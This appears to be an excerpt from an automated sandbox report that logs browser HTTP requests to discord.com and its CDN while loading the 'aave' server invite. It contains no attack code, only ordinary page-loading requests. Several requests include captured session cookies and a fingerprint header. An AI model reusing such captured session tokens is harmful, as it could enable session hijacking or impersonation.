cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /icons/602826299974877205/85edbf0edebc2025a16a76b89b1cb937.webp?size=64 HTTP/1.1Host: cdn.discordapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/6932d272acd867e3b6e3.js HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /splashes/602826299974877205/26d834daa945e775d8af2935a04f83e7.jpg?size=1280 HTTP/1.1Host: cdn.discordapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/a5ec2b74d0cc337d4481.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/invites/aave?with_counts=true&with_expiration=true HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/0e5029fd9cd4812b6712.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/23a7a3fd6624342117bf.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/assets/24a0aa8d37ef3037705f.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/b9995525a52dc58aecf5.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /icons/602826299974877205/85edbf0edebc2025a16a76b89b1cb937.webp?size=64 HTTP/1.1Host: cdn.discordapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=lxsRJdQWBQmxZaN4x1VnECUKy.lqVuO9TzSdHlPNn30-1727496770-1.0.1.1-m8D_twVBx7.b3hVuXPWz_o.ECIjw_CrB2bwKWsvLXHlLw7OdJG.mLEeAuUAZS.kCXmbL97AGc0ik8RRKDP_6YA; _cfuvid=MJXWNjql5yJezy3QpArrdCXJSD9SNH5ilXi9hdJGaXI-1727496770923-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/auth/location-metadata HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjMzMTE0NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=X-Fingerprint: 1289439632471363617.A-2PoLKzD9-wa7EEU6orKB9RamcX-Debug-Options: bugReporterEnabledsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36X-Discord-Timezone: America/New_YorkX-Discord-Locale: en-USsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/5430e9964fe8364e084d.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/ab03f7053698d417194c.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/410a2166a48c9e482e2a.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/9017b7062734e72bb476.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /splashes/602826299974877205/26d834daa945e775d8af2935a04f83e7.jpg?size=1280 HTTP/1.1Host: cdn.discordapp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=lxsRJdQWBQmxZaN4x1VnECUKy.lqVuO9TzSdHlPNn30-1727496770-1.0.1.1-m8D_twVBx7.b3hVuXPWz_o.ECIjw_CrB2bwKWsvLXHlLw7OdJG.mLEeAuUAZS.kCXmbL97AGc0ik8RRKDP_6YA; _cfuvid=MJXWNjql5yJezy3QpArrdCXJSD9SNH5ilXi9hdJGaXI-1727496770923-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/23a7a3fd6624342117bf.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/af5116b1db004acbdb8b.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/ba88bbd1342d3f000e33.svg HTTP/1.1Host: discord.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://discord.com/invite/aaveAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000; cf_clearance=Qv6XbuRgzjx9ZrERpiwFONMu99xqoZoOQF5wqF9Kpp4-1727496768-1.2.1.1-IMUS.xxQMdFmK6TdfKJzN684oX4Bqi4DW8uxKwOSyTm47RxfGpci42EzVg4h1pkdVMuwSrIeoW.KZy.i8A9SrKjYdq6k84K9u7Yc1MXqj0WmvahbhiKpA_yHw4CoRHIgh7UgL1vntZUFdhfFUHYGBx5fuoj_JGr6qZyAOHtSYbPJUolwj4SJNYlUdkGSvXxrF4XeEYlxTVJfCM_G5Pu2dgLmWBHohFaogLp_b3yFFggy4aOjb1L.7Kyg7TRh8nXQL_y4S_iP2GO0a361EcyWTUekgcu.xLIV1DNX_WUOHZVaIs6AmPYVheQbo.ERbybOGgIftYnuLFtiovFGPOJh16WtAFdktpyPJnFRSDhz8AEJSXubPIlXzxVMBRJSH6rj
Source: global trafficHTTP traffic detected: GET /assets/5430e9964fe8364e084d.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /api/v9/auth/location-metadata HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/ab03f7053698d417194c.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /assets/410a2166a48c9e482e2a.svg HTTP/1.1Host: discord.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __dcfduid=e13882007d4f11efa3da8f6690241f41; __sdcfduid=e13882017d4f11efa3da8f6690241f4140d329f8bce17106db6874943300eb67eb997f27cc01ca715af5959590893e94; __cfruid=fcb145931c723242d462c1abd73ada7a0a2ef089-1727496750; _cfuvid=pOasCB2fxbt8l0r7Sshxnmjim5EJFfrqzpbf5_OK8gQ-1727496750631-0.0.1.1-604800000
